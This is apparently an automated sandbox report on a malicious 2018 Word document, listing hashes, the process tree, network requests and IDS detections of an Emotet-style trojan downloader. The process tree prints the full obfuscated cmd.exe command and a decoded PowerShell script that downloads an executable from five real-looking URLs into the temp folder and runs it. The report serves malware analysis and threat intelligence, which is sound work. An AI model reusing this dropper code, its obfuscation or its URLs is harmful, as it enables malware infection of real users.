File name: | FA0883_9.doc |
Full analysis: | https://app.any.run/tasks/fe6bd668-f658-4b90-b8a0-b4c8a86cfeb0 |
Verdict: | Malicious activity |
Analysis date: | December 18, 2018, 20:13:08 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 4 18:07:00 2018, Last Saved Time/Date: Tue Dec 4 18:07:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 32, Security: 0 |
MD5: | E6C4D40B5A8F368C17BFED7BBB0BD429 |
SHA1: | FF0C2CA8B3A8AF6A0101FE031671E4C567359FB7 |
SHA256: | D6F2A2B18A5C9E2F66A0E8993B191A01B8F5B3E7C2F9D5CA42F5DDC7326C112B |
SSDEEP: | 1536:CWV3O7ljmW9/bvFM+a90Dw3/SQH7uQe86hSk2:0l/bvF+lve8aSk2 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:04 18:07:00 |
ModifyDate: | 2018:12:04 18:07:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 32 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 36 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2808 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA0883_9.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3828 | c:\DWdbHZb\mqkoNnISCcr\lIcLWFMiNnJ\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set 36nV=jnjQNBqvMifhzwJjVRVZTTtK@EbDU}I\X;H8(d/.py=$koue0C7-l r,:Ox+Fcm)gPW{9s24aAGS'&&for %R in (43;13;52;5;42;76;3;60;4;76;33;43;22;11;9;42;1;47;13;51;45;26;15;47;61;22;53;4;47;22;39;66;47;26;49;52;9;47;1;22;33;43;10;65;46;42;76;11;22;22;40;56;38;38;9;1;69;22;54;72;62;72;22;47;39;61;45;62;38;13;13;48;15;23;68;52;24;11;22;22;40;56;38;38;13;13;13;39;10;45;54;22;9;10;9;39;61;45;62;38;26;25;49;45;41;19;71;37;54;24;11;22;22;40;56;38;38;9;1;7;47;69;22;1;45;7;72;39;9;1;10;45;38;23;30;9;32;13;12;54;72;57;49;24;11;22;22;40;56;38;38;9;26;47;54;9;72;69;39;64;47;38;65;60;74;26;18;32;48;4;52;24;11;22;22;40;56;38;38;10;47;47;12;47;52;52;39;61;45;62;38;71;25;34;49;6;72;12;28;12;76;39;75;40;52;9;22;36;76;24;76;63;33;43;52;13;9;42;76;7;9;62;76;33;43;17;18;28;53;42;53;76;50;70;71;76;33;43;49;3;21;42;76;61;30;6;76;33;43;12;18;45;42;43;47;1;7;56;22;47;62;40;59;76;31;76;59;43;17;18;28;59;76;39;47;58;47;76;33;10;45;54;47;72;61;11;36;43;19;30;45;53;9;1;53;43;10;65;46;63;67;22;54;41;67;43;22;11;9;39;27;45;13;1;52;45;72;37;60;9;52;47;36;43;19;30;45;55;53;43;12;18;45;63;33;43;73;60;9;42;76;6;46;62;76;33;30;10;53;36;36;74;47;22;51;30;22;47;62;53;43;12;18;45;63;39;52;47;1;64;22;11;53;51;64;47;53;35;48;48;48;48;63;53;67;30;1;7;45;44;47;51;30;22;47;62;53;43;12;18;45;33;43;3;37;30;42;76;18;52;19;76;33;26;54;47;72;44;33;29;29;61;72;22;61;11;67;29;29;43;12;45;61;42;76;6;13;57;76;33;84)do set NaU=!NaU!!36nV:~%R,1!&&if %R geq 84 echo !NaU:*NaU!=!|FOR /F "tokens=4 delims=CcB." %v IN ('assoc.psc1')DO %v -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2304 | CmD /V:/C"set 36nV=jnjQNBqvMifhzwJjVRVZTTtK@EbDU}I\X;H8(d/.py=$koue0C7-l r,:Ox+Fcm)gPW{9s24aAGS'&&for %R in (43;13;52;5;42;76;3;60;4;76;33;43;22;11;9;42;1;47;13;51;45;26;15;47;61;22;53;4;47;22;39;66;47;26;49;52;9;47;1;22;33;43;10;65;46;42;76;11;22;22;40;56;38;38;9;1;69;22;54;72;62;72;22;47;39;61;45;62;38;13;13;48;15;23;68;52;24;11;22;22;40;56;38;38;13;13;13;39;10;45;54;22;9;10;9;39;61;45;62;38;26;25;49;45;41;19;71;37;54;24;11;22;22;40;56;38;38;9;1;7;47;69;22;1;45;7;72;39;9;1;10;45;38;23;30;9;32;13;12;54;72;57;49;24;11;22;22;40;56;38;38;9;26;47;54;9;72;69;39;64;47;38;65;60;74;26;18;32;48;4;52;24;11;22;22;40;56;38;38;10;47;47;12;47;52;52;39;61;45;62;38;71;25;34;49;6;72;12;28;12;76;39;75;40;52;9;22;36;76;24;76;63;33;43;52;13;9;42;76;7;9;62;76;33;43;17;18;28;53;42;53;76;50;70;71;76;33;43;49;3;21;42;76;61;30;6;76;33;43;12;18;45;42;43;47;1;7;56;22;47;62;40;59;76;31;76;59;43;17;18;28;59;76;39;47;58;47;76;33;10;45;54;47;72;61;11;36;43;19;30;45;53;9;1;53;43;10;65;46;63;67;22;54;41;67;43;22;11;9;39;27;45;13;1;52;45;72;37;60;9;52;47;36;43;19;30;45;55;53;43;12;18;45;63;33;43;73;60;9;42;76;6;46;62;76;33;30;10;53;36;36;74;47;22;51;30;22;47;62;53;43;12;18;45;63;39;52;47;1;64;22;11;53;51;64;47;53;35;48;48;48;48;63;53;67;30;1;7;45;44;47;51;30;22;47;62;53;43;12;18;45;33;43;3;37;30;42;76;18;52;19;76;33;26;54;47;72;44;33;29;29;61;72;22;61;11;67;29;29;43;12;45;61;42;76;6;13;57;76;33;84)do set NaU=!NaU!!36nV:~%R,1!&&if %R geq 84 echo !NaU:*NaU!=!|FOR /F "tokens=4 delims=CcB." %v IN ('assoc.psc1')DO %v -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3932 | C:\Windows\system32\cmd.exe /S /D /c" echo $wlB='QFN';$thi=new-object Net.WebClient;$fPu='http://instramate.com/ww0jK9l@http://www.fortifi.com/bECoyZ4dr@http://investnova.info/KIiXwzraOC@http://iberias.ge/PFGbVX0Nl@http://feezell.com/4EHCqazUz'.Split('@');$lwi='vim';$RVU = '724';$CQT='cIq';$zVo=$env:temp+'\'+$RVU+'.exe';foreach($ZIo in $fPu){try{$thi.DownloadFile($ZIo, $zVo);$AFi='qum';If ((Get-Item $zVo).length -ge 80000) {Invoke-Item $zVo;$QdI='VlZ';break;}}catch{}}$zoc='qwO';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4000 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=4 delims=CcB." %v IN ('assoc.psc1') DO %v -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2324 | C:\Windows\system32\cmd.exe /c assoc.psc1 | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2612 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR957F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2612 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y99CYJX5QCR8GY53FZZI.temp | — | |
MD5:— | SHA256:— | |||
2612 | powershell.exe | C:\Users\admin\AppData\Local\Temp\724.exe | — | |
MD5:— | SHA256:— | |||
2612 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2612 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19ad4d.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$0883_9.doc | pgc | |
MD5:11598753D744361E25D0ACC1E4E6DD8E | SHA256:0194F1623FA037D18A55CB86C9887DD9397F5EF58EA74E1A7517732ADEF9A141 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F8B313C273380B644EB92883C0F36F50 | SHA256:FFD351840C25693936FC2715FD07D74E21545B68153873C345BAE7E90DCA6001 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex | text | |
MD5:F3B25701FE362EC84616A93A45CE9998 | SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2612 | powershell.exe | GET | 301 | 209.95.55.249:80 | http://www.fortifi.com/bECoyZ4dr | US | — | — | malicious |
2612 | powershell.exe | GET | 404 | 209.95.55.249:80 | http://fortifi.com/bECoyZ4dr | US | html | 14.9 Kb | malicious |
2612 | powershell.exe | GET | 200 | 185.163.200.20:80 | http://iberias.ge/PFGbVX0Nl | GE | html | 31.1 Kb | malicious |
2612 | powershell.exe | GET | 200 | 143.95.231.73:80 | http://instramate.com/cgi-sys/suspendedpage.cgi | US | html | 7.12 Kb | malicious |
2612 | powershell.exe | GET | 404 | 188.40.38.76:80 | http://investnova.info/KIiXwzraOC | DE | html | 327 b | malicious |
2612 | powershell.exe | GET | 302 | 143.95.231.73:80 | http://instramate.com/ww0jK9l | US | html | 231 b | malicious |
2612 | powershell.exe | GET | 404 | 64.111.125.71:80 | http://feezell.com/4EHCqazUz | US | html | 326 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2612 | powershell.exe | 188.40.38.76:80 | investnova.info | Hetzner Online GmbH | DE | malicious |
2612 | powershell.exe | 143.95.231.73:80 | instramate.com | Colo4, LLC | US | malicious |
2612 | powershell.exe | 209.95.55.249:80 | www.fortifi.com | WestHost, Inc. | US | malicious |
2612 | powershell.exe | 64.111.125.71:80 | feezell.com | New Dream Network, LLC | US | malicious |
2612 | powershell.exe | 185.163.200.20:80 | iberias.ge | Caucasus Online Ltd. | GE | malicious |
Domain | IP | Reputation |
---|---|---|
instramate.com |
| malicious |
www.fortifi.com |
| malicious |
fortifi.com |
| malicious |
investnova.info |
| malicious |
iberias.ge |
| malicious |
feezell.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2612 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2612 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2612 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi' |
2612 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2612 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2612 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2612 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2612 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2612 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2612 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |